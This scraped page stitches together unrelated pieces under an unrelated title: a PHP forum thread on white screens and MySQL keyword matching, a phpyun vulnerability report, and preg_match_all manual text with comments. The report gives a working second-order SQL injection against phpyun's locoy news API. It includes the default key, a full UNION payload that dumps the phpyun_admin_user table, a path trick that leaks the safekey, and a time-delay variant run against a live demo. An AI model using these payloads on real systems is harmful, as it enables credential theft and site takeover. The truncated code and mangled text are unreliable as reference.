PHP Shendun (神盾) decryption: how to use splitword.php



Source: spider crawl (WebSpider) Time: 2016-03-19 10:22 Tags: php source code, how to use

White-screen problem with apache+php+mysql (Baidu Zhidao)
The environment is apache2.2.22 + php5.2.17 + mysql5.5.28 + ie8. At first there was no white screen. Then I added a word-segmentation feature, loaded with require_once (lib_splitword_full.php). After the system has been in use for a while (within half a day), refreshing the page and visiting index.php again gives a white screen. Restarting the machine brings it back (most restarts help, although once even a restart did not), but after a while the white screen returns, so it keeps coming back periodically. I also tried commenting out this require_once. All files loaded with require are local files.
After the white screen appears, the localhost log in Apache's logs directory contains no entries. I added error_reporting(E_ALL); ini_set('display_errors', '1'); at the top of index.php, and the log then shows:
Notice: Undefined variable: owl_lang in D:\... .php on line 32
Notice: Trying to get property of non-object in D:\... .php on line 302
The first lines of index.php are: <?php ob_start(); ... $out = ob_get_clean(); followed by lines of the form if (bcheckLibExists(...)) require_once(...); for files under $default->owl_fs_root and dirname(__FILE__).
I have a vague feeling that the code is at fault. Yuanfang, what do you think? Any help is appreciated; a solution will be generously rewarded.
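Look at the page source and check whether the encoding is wrong.
Install xdebug and debug it.
I have had this happen before too; uninstall INDEX. I had 360 installed.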
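A white screen with an empty log usually means a fatal error went unreported. The following is a minimal sketch, not the asker's code, of how the last recorded error could be written to the error log when the script ends. The helper names `format_last_error` and `log_fatal_on_shutdown` are made up for illustration; `error_get_last()`, `register_shutdown_function()` and `error_log()` are standard PHP functions.

```php
<?php
// Hypothetical helper: turn the array returned by error_get_last() into one log line.
function format_last_error($err)
{
    if (!is_array($err)) {
        return '';
    }
    return sprintf('[%d] %s in %s on line %d',
        $err['type'], $err['message'], $err['file'], $err['line']);
}

error_reporting(E_ALL);
ini_set('display_errors', '0'); // keep error text out of the page
ini_set('log_errors', '1');     // send it to the error log instead

// Runs when the script ends, including after a fatal error,
// and logs the last error PHP recorded (if any).
function log_fatal_on_shutdown()
{
    $line = format_last_error(error_get_last());
    if ($line !== '') {
        error_log('shutdown: ' . $line);
    }
}
register_shutdown_function('log_fatal_on_shutdown');
```

Placed at the very top of index.php, before any require_once, this would at least show whether the blank page coincides with an error in the segmentation library.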
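How can MySQL fuzzy-match keywords?
The database field currently holds data such as |饮料|咖啡|冷饮 (drinks|coffee|cold drinks).
The user enters 好喝的饮料 ("tasty drinks").
Since the field contains the word 饮料, how can this row be found by a query?
PHPChina community, PHP developer community

Here is an example, using like: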
[mw_shl_code=php,true]$sql = "select * from baojia";
$action = $_GET['action'];
// $value, $ssid and $wid must be escaped before they are placed in the SQL string
if ($action == 'change') {
    $sql = $sql . " where adddate like '%$value%'";
}
if (isset($ssid)) {
    $sql = $sql . " where ssid like '%$ssid%'";
}
if (isset($wid)) {
    $sql = $sql . " and wid like '%$wid%'";
}[/mw_shl_code]
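The LIKE example splices request values straight into the SQL text. As a hedged alternative, here is a sketch that builds the same kind of filter with placeholders. The function name `build_like_filter` is hypothetical, and the column names are assumed to be hard-coded by the caller (they are not escaped here).

```php
<?php
// Hypothetical helper: build the WHERE clause with placeholders instead of
// splicing request values into the SQL string.
// Column names (the array keys) must come from trusted code, not from user input.
function build_like_filter(array $filters)
{
    $clauses = array();
    $params  = array();
    foreach ($filters as $column => $value) {
        if ($value === null || $value === '') {
            continue; // skip filters the caller did not supply
        }
        // Escape LIKE wildcards so the input is matched literally.
        $escaped   = addcslashes($value, '%_\\');
        $clauses[] = "`$column` LIKE ?";
        $params[]  = '%' . $escaped . '%';
    }
    $sql = 'SELECT * FROM baojia';
    if ($clauses) {
        $sql .= ' WHERE ' . implode(' AND ', $clauses);
    }
    return array($sql, $params);
}

list($sql, $params) = build_like_filter(array('ssid' => 'a_1', 'wid' => null));
```

The resulting `$sql` and `$params` would then be handed to a prepared statement (for example PDO's `prepare()` and `execute()`), assuming the application has such a layer available.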

In your case the database field covers less than what the user typed in, so I suggest word segmentation.

qingyanbai wrote:
Here is an example, using like
like %keyword% can only find rows when the keyword is shorter than the stored field; in my case the input is longer than the field, so it cannot work.

For ordinary word-segmentation needs, dedesplit is good enough.
Usage:
require_once "lib_splitword_full.php";
$str = "浅析我国旅行社运作模式前景";
$sp = new SplitWord();
echo $sp->SplitRMM($str) . "<hr />";
$sp->Clear();
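Demo: http://www./split.php
An improved version of the segmenter has been uploaded; it supports both GBK and UTF-8 encodings.

赑屃Ⅳè蚊子 wrote:
For ordinary word-segmentation needs, dedesplit is good enough.
Usage:
That definitely won't do. Try entering 临安市锦城镇大华路 and the segmentation comes out a complete mess.

animo wrote:
That definitely won't do. Try entering 临安市锦城镇大华路 and the segmentation comes out a complete mess.
That is a demanding requirement... Without segmentation and without optimization, all I can think of is fetching the stored values and comparing each of them with "好喝的饮料". Just write your own class.

Last edited by 惊哲 at 12:37
SQL does not support this kind of fuzzy comparison.
--------------
I suggest handling it in PHP: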
[mw_shl_code=php,true]
// Compare the two strings against each other
$str = "好喝的饮料";
$store = "饮料|咖啡|冷饮|";
$arrData = explode('|', $store);
$sumData = count($arrData);
$matched = array();
for ($i = 0; $i < $sumData; $i++)
{
    if ($arrData[$i] === '') {
        continue; // the trailing "|" yields an empty entry
    }
    $back1 = strchr($arrData[$i], $str);
    $back2 = strchr($str, $arrData[$i]);

    // If either string occurs inside the other, record the entry
    if ($back1 !== false || $back2 !== false)
    {
        $matched[] = $arrData[$i];
    }
}
[/mw_shl_code]
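The comparison above can also be packaged as a small function. This is only a sketch under stated assumptions: the name `keywords_in_input` is invented here, the stored field is assumed to be pipe-delimited as in the question, and both strings are assumed to be UTF-8.

```php
<?php
// Hypothetical helper: return the stored keywords that occur inside the user's input.
function keywords_in_input($input, $store)
{
    $hits = array();
    foreach (explode('|', $store) as $keyword) {
        if ($keyword === '') {
            continue; // a leading or trailing "|" produces empty pieces
        }
        // strpos() compares bytes; for two UTF-8 strings that is enough
        // for an exact substring test.
        if (strpos($input, $keyword) !== false) {
            $hits[] = $keyword;
        }
    }
    return $hits;
}

$hits = keywords_in_input('好喝的饮料', '|饮料|咖啡|冷饮');
print_r($hits);
```

If the keywords were stored one per row instead of in a delimited field, the same reversed test could be done in MySQL itself with a condition of the form `'好喝的饮料' LIKE CONCAT('%', keyword, '%')`; whether that fits depends on the schema, which the thread does not show.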

MySQL has no such feature.
You have to write your own matching function.

Last edited by phptree at 15:08
If the check is done when the user writes the data, exploding the field into an array and then looping over it should work, shouldn't it?

Couldn't sphinx handle this?

Last edited by ikasa007 at 15:50
Well, maybe you can match in the other direction: first fetch the relevant field values from the database, then match each of them against the input string (or cut them out of it). If one matches, query the rows for that value. It doesn't sound complicated!

_熊出没注意-.- wrote:
Couldn't sphinx handle this?
I have never used sphinx; I'll take this chance to study it properly.
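Brief description:
The spot where the filter was bypassed before has also been changed slightly.
Even with this change it can still be bypassed directly, without restriction.
The administrator password and similar data can be read out directly. Locally the admin password came straight out; the demo was tested as well.
The demo is protected by Safedog (安全狗), which I don't know how to get past, so there I simply used a time delay.
Detailed description:
http://**.**.**.**/company/index.php?m=index&c=index&id=3751&style=../../template/admin&tp=/admin_web_config
This now opens as a blank page. Let's look at the code.
In company/model/index.class.php: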
$_GET['style'] = str_replace(array('.','/'),'',$_GET['style']);//so . and / are now filtered
if($row['comtpl'] && $row['comtpl']!="default" && !$_GET['style']){
$tplurl=$row[comtpl];
$this->registrs();
$tplurl="default";
if($_GET['style']){
$tplurl=$_GET['style'];
$tp=$_GET['tp']?$_GET['tp']:"index";
$this->public_action();
$this->yunset("msglist",$msglist);
$this->yunset("usertype",$_COOKIE['usertype']);
$this->yunset("uid",$this->uid);
$this->yunset("comclass_name",$comclass_name);
$this->yunset("com",$row);
$this->yunset("looktype",$looktype);
$this->yunset("look_msg",$look_msg);
$this->seo("company_".$tp);
$this->yunset("com_style",$this->config['sy_weburl']."/template/company/".$tplurl."/");
$this->yunset("comstyle","../template/company/".$tplurl."/");
$this->yuntpl(array('company/'.$tplurl."/".$tp));//but no worries, I still have $tp
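So we carry on bypassing the filter to get an injection.
Please disregard the above.
That part is from before; what is still a problem is the following.
The safekey generated by phpyun turns out to be the same everywhere.
I tested a number of sites and found that very few had changed it.
At first even the demo had not changed it; it was changed only after I had injected it a few times.
I recommend generating a random one. As far as I remember it used to be random.
Now they are all something like 72**. rand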
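The recommendation to generate a random key per installation could look roughly like this. It is a sketch only: `generate_install_key` is a hypothetical name, how phpyun actually stores or derives its safekey is not shown in the report, and `random_bytes()` requires PHP 7 or later.

```php
<?php
// Hypothetical helper: create a per-installation key at install time.
// random_bytes() (PHP 7+) draws from the operating system's CSPRNG.
function generate_install_key($bytes = 16)
{
    return bin2hex(random_bytes($bytes)); // two hex characters per byte
}

$key = generate_install_key();
echo strlen($key) . "\n";
```

The point of the design is that no two installations share a key, so a value learned from one site or from the public source code is useless elsewhere.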
In api\locoy\model\news.class.php:
function addnews_action(){
include("locoy_config.php");
if($locoyinfo['locoy_online']!=1){ //defaults to 1
if($locoyinfo['locoy_key']!=trim($_GET['key'])){//defaults to phpyun; hardly anyone changes it
if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){
$row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'");//check for duplicates
if(is_array($row)){
$value="";
$value.="`title`='".trim($_POST['title'])."',";
$value.="`nid`='".$_POST['nid']."',";
$value.="`author`='".$_POST['author']."',";
$value.="`description`='".$_POST['description']."',";
$value.="`source`='".$_POST['source']."'";
if($_POST['ctime']){
$value.=",`datetime`='".strtotime($_POST['ctime'])."'";
$value.=",`datetime`='".time()."'";
if($_POST['hits']){
$value.=",`hits`='".trim($_POST['hits'])."'";
$row=explode('-',$locoyinfo['locoy_rand']);
if(is_array($row)){
$rand=rand(trim($row[0]),trim($row[1]));
$rand=!trim($row)?0:$
$value.=",`hits`='".$rand."'";
if($_POST['sort']){
$value.=",`sort`='".trim($_POST['sort'])."'";
$row=explode('-',$locoyinfo['locoy_sort']);
if(is_array($row)){
$rand=rand(trim($row[0]),trim($row[1]));
$rand=!trim($row)?0:$
$value.=",`sort`='".$rand."'";
if($_POST['newsphoto']){
$value.=",`newsphoto`='".trim($_POST['newsphoto'])."'";
if($_POST['s_thumb']){
$value.=",`s_thumb`='".trim($_POST['s_thumb'])."'";
$content=$_POST['content'];
if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){
require(APP_PATH."/include/lib_splitword_class.php");
$sp = new SplitWord();
$keywordarr=$sp->getkeyword(strip_tags($content));
$value.=",`keyword`='".@implode(",",$keywordarr)."'";
}elseif($_POST['keyword']){
$value.=",`keyword`='".str_replace("，",",",$_POST['keyword'])."'";//...
$new_base = $this->obj->DB_insert_once("news_base",$value);//stored in the database
$news_content = $this->obj->DB_insert_once("news_content", "`nbid`='$new_base',`content`='$content'");
if($new_base){
In model/news.class.php:
function show_action()
$id=(int)$_GET['id'];
$news=$this->obj->DB_select_once("news_base","`id`='".$id."'");//read back out of the database here
$row=$this->obj->DB_select_once("news_content","`nbid`='".$id."'");
$news['content']=$row['content'];
$news_last=$this->obj->DB_select_once("news_base","`id`<'".$id."' order by `id` desc");
if(!empty($news_last)){
if($this->config[sy_news_rewrite]=="2"){
$news_last["url"]=$this->config['sy_weburl']."/news/".date("Ymd",$news_last["datetime"])."/".$news_last['id'].".html";
$news_last["url"]= $this->Url("index",'news',array('c'=>'show',"id"=>$news_last[id]),"1");
$news_next=$this->obj->DB_select_once("news_base","`id`>'".$id."' order by `id` asc");
if(!empty($news_next)){
if($this->config[sy_news_rewrite]=="2"){
$news_next["url"]=$this->config['sy_weburl']."/news/".date("Ymd",$news_next["datetime"])."/".$news_next['id'].".html";
$news_next["url"]= $this->Url("index",'news',array('c'=>'show',"id"=>$news_next[id]),"1");
$class=$this->obj->DB_select_once("news_group","`id`='".$news['nid']."'");
if($news[0]["keyword"]!="")//if the keyword read back is not empty
$keyarr = @explode(",",$news["keyword"]);//keywords are split on commas, which means commas cannot be used
if(is_array($keyarr) && !empty($keyarr))
foreach($keyarr as $key=>$value)
$sqlkeyword[]= " `keyword` LIKE '%$value%'";//the value read back is spliced in again, which means a single quote can be introduced
$sqlkw = @implode("OR",$sqlkeyword);
$about=$this->obj->DB_select_all("news_base"," 1 AND
($sqlkw) AND `id`<>'".$id."' order by `id` desc limit 6");//query
if(is_array($about)){
foreach($about as $k=>$v){
if($this->config[sy_news_rewrite]=="2"){
$about[$k]["url"]=$this->config['sy_weburl']."/news/".date("Ymd",$v["datetime"])."/".$v['id'].".html";
$about[$k]["url"]= $this->Url("index",'news',array('c'=>'show',"id"=>$v[id]),"1");
$data['news_title']=$news['title'];
$data['news_keyword']=$news['keyword'];
$data['news_author']=$news['author'];
$data['news_source']=$news['source'];
$data['news_class']=$class['name'];
$data['news_desc']=$this->obj->GET_content_desc($news['description']);
$this->data=$
$info["news_class"]=$class['name'];
$info["last"]=$news_
$info["next"]=$news_
$info["like"]=$
$this->yunset("Info",$info);//echoed straight back here
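Because this is a second-order injection, doing it blind would be very cumbersome.
So we still need to find a way to use a UNION query.
Then build it: the main statement has 16 columns, so 16 are needed.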
%') and 1=2 UNION SELECT * FROM
((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN(SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f JOIN (SELECT 7)g JOIN (SELECT 8)h JOIN (SELECT 9)i JOIN (SELECT 10)j JOIN (SELECT 11)k JOIN (SELECT 12)l JOIN (SELECT 13)m JOIN (SELECT 14)n JOIN (SELECT 15)o JOIN (a 16)p)#
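Afterwards I found that the value had not been stored completely in the database.
| varchar(200) | NO
Looking at the database showed that the keyword column can only hold 200 characters, while the statement above is already about 300. So it has to be shortened to 200.
Then I looked at the admin table phpyun_admin_user, which has 8 columns.
So let's build it again: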
') and 1=2 union select * from phpyun_admin_user join (select 1)a join (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)f join(select 6)g join (select 7)o join(select 8)p#
mysql> select length('\') and 1=2 union select * from phpyun_admin_user join (select 1)a join (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)f join(select 6)g join (select 7)o join(select 8)p#');
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------------------------------+
| length('\') and 1=2 union select * from phpyun_admin_user join (select 1)a joi
n (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)
f join(select 6)g join (select 7)o join(select 8)p#') |
+-------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------------------------------+
What luck... exactly 200 characters.
Now to test.
http://web/web/phpyun1226/api/locoy/index.php/admin/?m=news&c=addnews&key=phpyun
title=xa&content=xxax&nid=555&keyword=') and 1=2 union select * from phpyun_admin_user join (select 1)a join (select 2)b join (select 2)c join (select 3)d join (select 4) e join(select 5)f join(select 6)g join (select 7)o join(select 8)p#&safekey=939ab244bfc16c6013fadef6e6ecc702
It returns 1: added successfully.
Then visit the news item with the last id; for this we only need to write a very large id:
http://web/web/phpyun1226/index.php?m=news&c=show&id=21
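The page then offers a "previous news" link; clicking it leads to our news item.
The data comes straight out.
Now a demonstration against the demo.
Here the request is blocked, so we fetch the safekey first: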
http://**.**.**.**/company/index.php?m=index&c=index&id=3751&style=index&tp=../../../template/admin/admin_web_config
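This bypasses the filter and yields the safekey directly.
Then compute the safekey.
As can be seen, the computed safekey gets past the filter again.
But I cannot get past the demo's Safedog, so here I use a time delay instead.
It returns 1: added successfully.
http://**.**.**.**/index.php?m=news&c=show&id=457 //with the delay
http://**.**.**.**/index.php?m=news&c=show&id=450 //normal
The response times are clearly different.
Proof of vulnerability:
Fix:
Filter the data when it is read back out of the database.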
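One way to apply the suggested fix is to stop splicing stored keywords into the SQL text at all. The sketch below is an assumption-laden illustration, not phpyun's code: `related_news_condition` is a made-up name, and it presumes the database layer can run a prepared statement with bound parameters, which the report does not confirm.

```php
<?php
// Hypothetical helper: build the "related news" condition from stored keywords
// with placeholders, so values read back from the database never become SQL text.
function related_news_condition($keywordCsv)
{
    $clauses = array();
    $params  = array();
    foreach (explode(',', $keywordCsv) as $keyword) {
        $keyword = trim($keyword);
        if ($keyword === '') {
            continue;
        }
        $clauses[] = '`keyword` LIKE ?';
        // Escape LIKE wildcards; quoting is left to the database driver.
        $params[]  = '%' . addcslashes($keyword, '%_\\') . '%';
    }
    if (!$clauses) {
        return array('0', array()); // no keywords: match nothing
    }
    return array('(' . implode(' OR ', $clauses) . ')', $params);
}

list($where, $params) = related_news_condition("php, it's");
```

A quote inside a stored keyword then travels as data in `$params` and cannot close the string literal of the query.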
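Copyright notice: please credit the source when reposting @
Vendor response:
Severity: medium
Vulnerability rank: 10
Confirmed at: 14:08
Vendor reply:
Thanks for the report!
Latest status:
Comments on the vulnerability:
When is 雨神 taking the college entrance exam?
What... there must be some mistake.
This one is from a long time ago.
It was not reviewed back then,
and it has all been fixed by now.
@′雨。 Then study hard instead of hunting for bugs. Does this mean it had already been reported?
This is from ages ago, :-(
Just a poor student who barely broke 400.
@′雨。 A long time ago? The submission time shown is today.
Typed a few words on my phone.
Here to help update it.
It was submitted earlier and has only now passed review.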
preg_match_all
preg_match_all - Perform a global regular expression match
Description
int preg_match_all ( string $pattern , string $subject [, array &$matches [, int $flags = PREG_PATTERN_ORDER [, int $offset = 0 ]]] )
After the first match is found, the search continues to the end of the string.
Parameters
pattern
The pattern to search for, as a string.
subject
The input string.
matches
Array of all matches, in a multi-dimensional array ordered according to the flags parameter.
flags
Can be one of the following two values (note that it does not make sense to use PREG_PATTERN_ORDER together with PREG_SET_ORDER):
PREG_PATTERN_ORDER
Orders results so that $matches[0] is an array of the full pattern matches, $matches[1] is an array of the strings matched by the first capturing parenthesis, and so on.
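The example this passage refers to did not survive in the text. The following sketch is a call of that kind; the pattern and input are assumptions chosen so that the two printed lines are consistent with the output quoted next.

```php
<?php
// Assumed sample pattern and input, not recovered from the page.
preg_match_all("|<[^>]+>(.*)</[^>]+>|U",
    "<b>exemple : </b><div align=left>ceci est un test</div>",
    $out, PREG_PATTERN_ORDER);
// $out[0] holds the full matches, $out[1] the first capture group.
echo $out[0][0] . ", " . $out[0][1] . "\n";
echo $out[1][0] . ", " . $out[1][1] . "\n";
```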
The above example will output:
<b>exemple : </b>, <div align=left>ceci est un test</div>
exemple : , ceci est un test
So, $out[0] is an array of the strings that matched the full pattern, and $out[1] is an array of the strings enclosed by the tags.
PREG_SET_ORDER
Orders results so that $matches[0] is an array of the first set of matches, $matches[1] is an array of the second set, and so on.
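Again the example itself is missing from the text. A sketch of a matching call, with the pattern and input assumed so that the result agrees with the output quoted next:

```php
<?php
// Assumed sample pattern and input, not recovered from the page.
preg_match_all("|<[^>]+>(.*)</[^>]+>|U",
    "<b>exemple : </b><div align=\"left\">ceci est un test</div>",
    $out, PREG_SET_ORDER);
// Each $out[n] is one complete match set: full match first, then its groups.
echo $out[0][0] . ", " . $out[0][1] . "\n";
echo $out[1][0] . ", " . $out[1][1] . "\n";
```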
The above example will output:
<b>exemple : </b>, exemple :
<div align="left">ceci est un test</div>, ceci est un test
PREG_OFFSET_CAPTURE
If this flag is passed, every matching substring is also identified by its offset. Note that this changes the format of the returned value, since every element of the result becomes an array containing the matched substring at index 0 and its offset in the subject string at index 1.
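A small illustration of the changed result format; the pattern and subject are made up for the example.

```php
<?php
preg_match_all('/\d+/', 'a1 b22', $m, PREG_OFFSET_CAPTURE);
// Each element of $m[0] is array(matched string, byte offset in the subject).
foreach ($m[0] as $hit) {
    echo $hit[0] . ' at ' . $hit[1] . "\n";
}
```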
If no order flag is given, PREG_PATTERN_ORDER is used by default.
offset
Normally, the search starts at the beginning of the subject string. The optional offset parameter can be used to specify a position at which to start the search (in bytes).
Using offset is not equivalent to passing substr($subject, $offset) to preg_match_all() in place of the subject string, because pattern can contain assertions such as (?<=x). See the documentation of preg_match() for examples.
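The difference between an offset and substr() shows up as soon as the pattern looks behind the start position. A minimal sketch with a made-up subject:

```php
<?php
$subject = 'abcdef';

// With $offset = 3 the lookbehind can still see the "c" before the start position.
$withOffset = preg_match_all('/(?<=c)def/', $subject, $m1, PREG_PATTERN_ORDER, 3);

// With substr() the "c" is gone, so the lookbehind cannot succeed.
$withSubstr = preg_match_all('/(?<=c)def/', substr($subject, 3), $m2);

echo $withOffset . ' ' . $withSubstr . "\n";
```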
Return Values
Returns the number of full pattern matches, or FALSE if an error occurred.
Changelog
Example #1 Extracting all phone numbers from a text
<?php
preg_match_all("/\(?  (\d{3})?  \)?  (?(1)  [\-\s] ) \d{3}-\d{4}/x",
                "Call 555-1212 or 1-800-555-1212", $phones);
?>
Example #2 Finding pairs of HTML tags (greedy)
<?php
// This example uses backreferences (\\2).
// They tell the parser that it must find something it has
// already matched a little earlier;
// the number 2 indicates that the second set of capturing
// parentheses is to be used (here, ([\w]+)).
// The backslash is necessary here because the string is in double quotes.
$html = "<b>texte en gras</b><a href=howdy.html>cliquez moi</a>";

preg_match_all("/(<([\w]+)[^>]*>)(.*?)(<\/\\2>)/", $html, $matches, PREG_SET_ORDER);

foreach ($matches as $val) {
    echo "matched: " . $val[0] . "\n";
    echo "part 1: " . $val[1] . "\n";
    echo "part 2: " . $val[2] . "\n";
    echo "part 3: " . $val[3] . "\n";
    echo "part 4: " . $val[4] . "\n\n";
}
?>
The above example will output:
matched: <b>texte en gras</b>
part 1: <b>
part 2: b
part 3: texte en gras
part 4: </b>

matched: <a href=howdy.html>cliquez moi</a>
part 1: <a href=howdy.html>
part 2: a
part 3: cliquez moi
part 4: </a>
Example #3 Using a named subpattern
<?php
$str = <<<FOO
a: 1
b: 2
c: 3
FOO;

preg_match_all('/(?P<name>\w+): (?P<digit>\d+)/', $str, $matches);

/* This also works in PHP 5.2.2 (PCRE 7.0) and later,
 * however, the form above is recommended for
 * backwards compatibility */
// preg_match_all('/(?<name>\w+): (?<digit>\d+)/', $str, $matches);

print_r($matches);
?>
The above example will output:
Array
(
    [0] => Array
        (
            [0] => a: 1
            [1] => b: 2
            [2] => c: 3
        )

    [name] => Array
        (
            [0] => a
            [1] => b
            [2] => c
        )

    [1] => Array
        (
            [0] => a
            [1] => b
            [2] => c
        )

    [digit] => Array
        (
            [0] => 1
            [1] => 2
            [2] => 3
        )

    [2] => Array
        (
            [0] => 1
            [1] => 2
            [2] => 3
        )

)
See Also
preg_quote() - Quote regular expression characters
preg_match() - Perform a regular expression match
preg_replace() - Perform a regular expression search and replace
preg_split() - Split a string by a regular expression
preg_last_error() - Returns the error code of the last PCRE regex execution
I needed a function to rotate the results of a preg_match_all query, and made this. Not sure if it exists.
<?php
function turn_array($m)
{
    $rt = array(); // returned as-is when $m is empty
    for ($z = 0; $z < count($m); $z++)
    {
        for ($x = 0; $x < count($m[$z]); $x++)
        {
            // swap the two indexes: group/match becomes match/group
            $rt[$x][$z] = $m[$z][$x];
        }
    }
    return $rt;
}
?>
Example - Take results of some preg_match_all query:
Array
(
    [0] => Array
        (
            [1] => Banff
            [2] => Canmore
            [3] => Invermere
        )
    [1] => Array
        (
            [1] => AB
            [2] => AB
            [3] => BC
        )
    [2] => Array
        (
            [1] => 51.1746254
            [2] => 51.0938416
            [3] => 50.5065193
        )
    [3] => Array
        (
            [1] => -115.5719757
            [2] => -115.3517761
            [3] => -116.0321884
        )
    [4] => Array
        (
            [1] => T1L 1B3
            [2] => T1W 1N2
            [3] => V0B 2G0
        )
)
Rotate it 90 degrees to group results as records:
Array
(
    [0] => Array
        (
            [1] => Banff
            [2] => AB
            [3] => 51.1746254
            [4] => -115.5719757
            [5] => T1L 1B3
        )
    [1] => Array
        (
            [1] => Canmore
            [2] => AB
            [3] => 51.0938416
            [4] => -115.3517761
            [5] => T1W 1N2
        )
    [2] => Array
        (
            [1] => Invermere
            [2] => BC
            [3] => 50.5065193
            [4] => -116.0321884
            [5] => V0B 2G0
        )
)
Recently I had to write a search engine in Hebrew and ran into a huge number of problems. My data was stored in a MySQL table with utf8_bin encoding.
So, to be able to write Hebrew into a utf8 table you need to do
<?php
$prepared_text = addslashes(utf8_encode($text));
?>
But then I had to find out whether some word exists in the stored text. This is where I got stuck. A simple preg_match would not find the text, since Hebrew doesn't work that easily. I tried /u and who knows what else.
The solution was somewhat logical and simple...
<?php
$db_text = bin2hex(stripslashes(utf8_decode($db_text)));
$word = bin2hex($word);
$found = preg_match_all("/($word)+/i", $db_text, $matches);
?>
I used preg_match_all since it returns the number of occurrences, so I could sort the search results accordingly.
Hope someone finds this useful!

The code that john at mccarthy dot net posted is not necessary. If you want your results grouped by individual match simply use:
<?php
preg_match_all($pattern, $string, $matches, PREG_SET_ORDER);
?>
E.g.
<?php
preg_match_all('/([GH])([12])([!?])/', 'G1? H2!', $matches); // Default PREG_PATTERN_ORDER
// $matches = array(0 => array(0 => 'G1?', 1 => 'H2!'),
//                  1 => array(0 => 'G', 1 => 'H'),
//                  2 => array(0 => '1', 1 => '2'),
//                  3 => array(0 => '?', 1 => '!'))

preg_match_all('/([GH])([12])([!?])/', 'G1? H2!', $matches, PREG_SET_ORDER);
// $matches = array(0 => array(0 => 'G1?', 1 => 'G', 2 => '1', 3 => '?'),
//                  1 => array(0 => 'H2!', 1 => 'H', 2 => '2', 3 => '!'))
?>

Here is a function that replaces every number occurring in a string by that number minus one (number--):
<?php
function decremente_chaine($chaine)
{
    preg_match_all("/[0-9]+/", $chaine, $out, PREG_OFFSET_CAPTURE);
    for ($i = 0; $i < sizeof($out[0]); $i++)
    {
        $longueurnombre = strlen((string)$out[0][$i][0]);
        $taillechaine = strlen($chaine);
        $debut = substr($chaine, 0, $out[0][$i][1]);
        $milieu = ($out[0][$i][0]) - 1;
        $fin = substr($chaine, $out[0][$i][1] + $longueurnombre, $taillechaine);
        // Meant for numbers such as 10 or 100, which lose a digit when
        // decremented: shift the offsets of the remaining matches by one.
        if (preg_match('#[1][0]+$#', $out[0][$i][0]))
        {
            for ($j = $i + 1; $j < sizeof($out[0]); $j++)
            {
                $out[0][$j][1] = $out[0][$j][1] - 1;
            }
        }
        $chaine = $debut . $milieu . $fin;
    }
    return $chaine;
}
?>

If you want to extract all {token}s from a string:
<?php
$pattern = "/{[^}]*}/";
$subject = "{token1} foo {token2} bar";
preg_match_all($pattern, $subject, $matches);
print_r($matches);
?>
output:
Array
(
    [0] => Array
        (
            [0] => {token1}
            [1] => {token2}
        )
)

To count the string length of a UTF-8 string I use
$count = preg_match_all("/[[:print:]\pL]/u", $str, $pockets);
where
[:print:] - printing characters, including space
\pL - UTF-8 letter
/u - UTF-8 string
other unicode character properties on
For parsing queries with entities use:
<?php
preg_match_all("/(?:^|(?<=\&(?![a-z]+\;)))([^\=]+)=(.*?)(?:$|\&(?![a-z]+\;))/i",
  $s, $m, PREG_SET_ORDER );
?>
Here's some fleecy code to 1. validate RCF2822 conformity of address lists and 2. to extract the address specification (the part commonly known as 'email'). I wouldn't suggest using it for input form email checking, but it might be just what you want for other email applications. I know it can be optimized further, but that part I'll leave up to you nutcrackers. The total length of the resulting Regex is about 30000 bytes. That because it accepts comments. You can remove that by setting $cfws to $fws and it shrinks to about 6000 bytes. Conformity checking is absolutely and strictly referring to RFC2822. Have fun and email me if you have any enhancements!&?phpfunction mime_extract_rfc2822_address($string){& & & & $crlf& & & & && = "(?:\r\n)";& & & & $wsp& & & & & & = "[\t ]";& & & & $text& & & & && = "[\\x01-\\x09\\x0B\\x0C\\x0E-\\x7F]";& & & & $quoted_pair& & = "(?:\\\\$text)";& & & & $fws& & & & & & = "(?:(?:$wsp*$crlf)?$wsp+)";& & & & $ctext& & & & & = "[\\x01-\\x08\\x0B\\x0C\\x0E-\\x1F" .& & & & & & & & & & & & & "!-'*-[\\]-\\x7F]";& & & & $comment& & & & = "(\$(?:$fws?(?:$ctext|$quoted_pair|(?1)))*" .& & & & & & & & & & & & & "$fws?\$)";& & & & $cfws& & & & && = "(?:(?:$fws?$comment)*(?:(?:$fws?$comment)|$fws))";& & & & $atext& & & & & = "[!#-'*+\\-\\/0-9=?A-Z\\^-~]";& & & & $atom& & & & && = "(?:$cfws?$atext+$cfws?)";& & & & $dot_atom_text& = "(?:$atext+(?:\\.$atext+)*)";& & & & $dot_atom& & && = "(?:$cfws?$dot_atom_text$cfws?)";& & & & $qtext& & & & & = "[\\x01-\\x08\\x0B\\x0C\\x0E-\\x1F!#-[\\]-\\x7F]";& & & & $qcontent& & && = "(?:$qtext|$quoted_pair)";& & & & $quoted_string& = "(?:$cfws?\"(?:$fws?$qcontent)*$fws?\"$cfws?)";& & & & $dtext& & & & & = "[\\x01-\\x08\\x0B\\x0C\\x0E-\\x1F!-Z\\^-\\x7F]";& & & & $dcontent& & && = "(?:$dtext|$quoted_pair)";& & & & $domain_literal = "(?:$cfws?\\[(?:$fws?$dcontent)*$fws?]$cfws?)";& & & & $domain& & & && = "(?:$dot_atom|$domain_literal)";& & & & $local_part& && = "(?:$dot_atom|$quoted_string)";& & & & $addr_spec& & & = 
"($local_part@$domain)";& & & & $display_name&& = "(?:(?:$atom|$quoted_string)+)";& & & & $angle_addr& && = "(?:$cfws?&$addr_spec&$cfws?)";& & & & $name_addr& & & = "(?:$display_name?$angle_addr)";& & & & $mailbox& & & & = "(?:$name_addr|$addr_spec)";& & & & $mailbox_list&& = "(?:(?:(?:(?&=:)|,)$mailbox)+)";& & & & $group& & & & & = "(?:$display_name:(?:$mailbox_list|$cfws)?;$cfws?)";& & & & $address& & & & = "(?:$mailbox|$group)";& & & & $address_list&& = "(?:(?:^|,)$address)+";& & & & echo(strlen($address_list) . " ");& & & & preg_match_all("/^$address_list$/", $string, $array, PREG_SET_ORDER);& & & & return $array;};?&
This is a function to convert byte offsets into (UTF-8) character offsets (this is regardless of whether you use the /u modifier):
<?php
